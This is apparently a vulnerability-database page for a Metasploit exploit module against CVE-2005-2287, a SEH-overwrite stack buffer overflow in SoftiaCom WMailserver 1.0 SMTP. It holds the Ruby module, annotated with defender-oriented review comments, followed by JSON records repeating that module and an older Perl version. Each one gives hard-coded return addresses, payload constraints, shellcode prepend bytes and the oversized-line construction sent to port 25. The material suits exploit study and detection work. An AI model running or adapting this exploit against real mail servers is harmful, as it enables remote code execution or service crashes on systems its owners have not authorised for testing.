ID MSF:EXPLOIT/WINDOWS/SMTP/WMAILSERVER
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the SoftiaCom WMailserver 1.0 SMTP
# stack buffer overflow (CVE-2005-2287), triggered through an overwritten
# SEH frame.
#
# Review notes for defenders and for authorized testers:
# - The module sends a single unauthenticated line and no SMTP verb: a leading
#   space, 5115 random upper-case letters, the SEH record with the payload,
#   200 more letters and a CRLF CRLF terminator. A command line of that size
#   is far above the 512-octet limit of RFC 5321, which makes line length the
#   observable to alert on or to enforce at an SMTP proxy.
# - There is no `check` method and the server banner is never read, so the
#   product and version are not verified before the buffer is sent.
# - The public CVE-2005-2287 description and its CVSS v2 vector (A:P only)
#   rate the issue as a denial of service, while this module treats it as
#   code execution; do not triage on the CVSS score alone, and expect a
#   failed attempt to crash the service.
# - Both targets are fixed return addresses for specific legacy English
#   Windows builds; other builds are not covered by this module.
class MetasploitModule < Msf::Exploit::Remote
# Reliability rank assigned by the module author.
Rank = AverageRanking
# Tcp supplies connect/sock/disconnect; Seh supplies generate_seh_payload.
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
# Registers the module metadata (name, references, payload constraints,
# targets) and the default remote port.
#
# @param info [Hash] metadata passed in by the framework and merged via update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
(SMTP) via a SEH frame overwrite.
},
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2005-2287' ],
[ 'OSVDB', '17883' ],
[ 'BID', '14213' ],
],
# Default payload exit technique: end only the current thread.
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
# NOTE(review): in Metasploit this flag marks a module that needs or yields
# privileged access; presumably the mail service runs elevated -- confirm.
'Privileged' => true,
# Payload constraints: at most 600 bytes, and the encoder must avoid NUL, LF,
# CR and space. PrependEncoder is raw machine code placed ahead of the
# encoder stub; presumably a stack-pointer adjustment -- confirm by
# disassembly.
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
# One hard-coded return address per supported OS build.
'Targets' =>
[
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 11 2005'))
# SMTP default port; the operator can override RPORT.
register_options([ Opt::RPORT(25) ])
end
# Connects to the target, sends the single oversized line and hands control
# to the payload handler. The server's reply is never read and nothing is
# validated before sending.
def exploit
connect
# Leading space followed by 5115 random upper-case letters of padding.
filler = " " + rand_text_alpha_upper(5115)
# SEH record and encoded payload built from the selected target's address.
seh = generate_seh_payload(target.ret)
# 200 further random letters follow the SEH record and payload.
sploit = filler + seh + rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
# Sent as one line terminated by CRLF CRLF.
sock.put(sploit + "\r\n\r\n")
# Framework call; presumably lets the payload handler pick up a session.
handler
disconnect
end
end
{"id": "MSF:EXPLOIT/WINDOWS/SMTP/WMAILSERVER", "type": "metasploit", "bulletinFamily": "exploit", "title": "SoftiaCom WMailserver 1.0 Buffer Overflow", "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.\n", "published": "2006-12-23T18:32:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287"], "cvelist": ["CVE-2005-2287"], "lastseen": "2020-07-13T04:26:09", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2287"]}, {"type": "exploitdb", "idList": ["EDB-ID:1463"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83132"]}, {"type": "seebug", "idList": ["SSV:13603"]}]}, "score": {"value": 6.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2005-2287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF"]}, {"type": "kitploit", "idList": ["KITPLOIT:5653496433376619357", "KITPLOIT:8458155717277021778"]}, {"type": "n0where", "idList": ["N0WHERE:161003"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83132"]}, {"type": "seebug", "idList": ["SSV:13603"]}]}, "exploitation": null, "vulnersScore": 6.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/wmailserver.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow',\n 
'Description' => %q{\n This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.\n },\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2005-2287' ],\n [ 'OSVDB', '17883' ],\n [ 'BID', '14213' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All', \t\t{ 'Ret' => 0x75022ac4 } ],\n [ 'Windows XP Pro SP0/SP1 English', \t\t{ 'Ret' => 0x71aa32ad } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 11 2005'))\n\n register_options([ Opt::RPORT(25) ])\n end\n\n def exploit\n connect\n\n filler = \" \" + rand_text_alpha_upper(5115)\n seh = generate_seh_payload(target.ret)\n sploit = filler + seh + rand_text_alpha_upper(200)\n\n print_status(\"Trying target #{target.name}...\")\n sock.put(sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}
{"packetstorm": [{"lastseen": "2016-12-05T22:15:28", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "SoftiaCom WMailserver 1.0 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2005-2287"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83132", "href": "https://packetstormsecurity.com/files/83132/SoftiaCom-WMailserver-1.0-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 \n(SMTP) via a SEH frame overwrite. 
\n}, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-2287' ], \n[ 'OSVDB', '17883' ], \n[ 'BID', '14213' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Platform' => 'win', \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Targets' => \n[ \n[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], \n[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 11 2005 ')) \n \nregister_options([ Opt::RPORT(25) ], self.class) \nend \n \ndef exploit \nconnect \n \nfiller = \" \" + rand_text_alpha_upper(5115) \nseh = generate_seh_payload(target.ret) \nsploit = filler + seh + rand_text_alpha_upper(200) \n \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit + \"\\r\\n\\r\\n\") \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83132/wmailserver.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:48", "description": "\nSoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "edition": 2, "cvss3": {}, "published": "2006-02-01T00:00:00", "title": "SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2005-2287"], "modified": "2006-02-01T00:00:00", "id": "EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF", "href": "", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::wmailserver_smtp;\nuse base \"Msf::Exploit\";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\n\t },\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\n\t'Payload' =>\n\t {\n\t\t'Space' => 600,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20:=+\\x22\",\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\n\t'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\n\tvia a SEH frame overwrite.\n}),\n\n\t'Refs' =>\n\t [\n\t\t['CVE', 'CAN-2005-2287'],\n\t\t['BID', '14213'],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\n\t\t['Windows 2000 English ALL', 0x75022ac4],\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\n\t ],\n\t'Keys' => ['smtp'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = 
$self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n\n\tif (! $self->InitNops(128)) {\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\n\t\treturn;\n\t}\n\n\tmy $splat = Pex::Text::UpperCaseText(5117);\n\n\tmy $sploit =\n\t \" \". $splat. \"\\xeb\\x06\". pack('V', $target->[1]).\n\t $shellcode. \"\\r\\n\\r\\n\";\n\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\n\t$s->Send($sploit);\n\t$self->Handler($s);\n\t$s->Close();\n\treturn;\n}\n\n1;\n\n# milw0rm.com [2006-02-01]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T22:31:40", "description": "No description provided by source.", "cvss3": {}, "published": "2006-02-01T00:00:00", "type": "seebug", "title": "SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2005-2287"], "modified": "2006-02-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-13603", "id": "SSV:13603", "sourceData": "\n \n##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). 
The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::wmailserver_smtp;\nuse base "Msf::Exploit";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\n\t },\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\n\t'Payload' =>\n\t {\n\t\t'Space' => 600,\n\t\t'BadChars' => "\\x00\\x0a\\x0d\\x20:=+\\x22",\n\t\t'Prepend' => "\\x81\\xc4\\xff\\xef\\xff\\xff\\x44",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\n\t'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\n\tvia a SEH frame overwrite.\n}),\n\n\t'Refs' =>\n\t [\n\t\t['CVE', 'CAN-2005-2287'],\n\t\t['BID', '14213'],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\n\t\t['Windows 2000 English ALL', 0x75022ac4],\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\n\t ],\n\t'Keys' => ['smtp'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n\n\tif (! $self->InitNops(128)) {\n\t\t$self->PrintLine("[*] Failed to initialize the nop module.");\n\t\treturn;\n\t}\n\n\tmy $splat = Pex::Text::UpperCaseText(5117);\n\n\tmy $sploit =\n\t " ". $splat. "\\xeb\\x06". pack('V', $target->[1]).\n\t $shellcode. 
"\\r\\n\\r\\n";\n\n\t$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\n\t$s->Send($sploit);\n\t$self->Handler($s);\n\t$s->Close();\n\treturn;\n}\n\n1;\n\n# sebug.net\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-13603", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:12:43", "description": "SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.", "cvss3": {}, "published": "2005-07-18T04:00:00", "type": "cve", "title": "CVE-2005-2287", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2287"], "modified": "2016-10-18T03:25:00", "cpe": ["cpe:/a:softiacom:wmailserver:2.0", "cpe:/a:softiacom:wmailserver:1.0"], "id": "CVE-2005-2287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2287", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:softiacom:wmailserver:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:softiacom:wmailserver:1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": 
"2022-01-13T07:13:22", "description": "", "cvss3": {}, "published": "2006-02-01T00:00:00", "type": "exploitdb", "title": "SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2287", "2005-2287"], "modified": "2006-02-01T00:00:00", "id": "EDB-ID:1463", "href": "https://www.exploit-db.com/exploits/1463", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). 
The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::wmailserver_smtp;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\r\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\r\n\t'Priv' => 0,\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 600,\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20:=+\\x22\",\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\r\n\tvia a SEH frame overwrite.\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['CVE', 'CAN-2005-2287'],\r\n\t\t['BID', '14213'],\r\n\t ],\r\n\t'Targets' =>\r\n\t [\r\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\r\n\t\t['Windows 2000 English ALL', 0x75022ac4],\r\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\r\n\t ],\r\n\t'Keys' => ['smtp'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (! 
$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $splat = Pex::Text::UpperCaseText(5117);\r\n\r\n\tmy $sploit =\r\n\t \" \". $splat. \"\\xeb\\x06\". pack('V', $target->[1]).\r\n\t $shellcode. \"\\r\\n\\r\\n\";\r\n\r\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($sploit);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-02-01]", "sourceHref": "https://www.exploit-db.com/download/1463", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}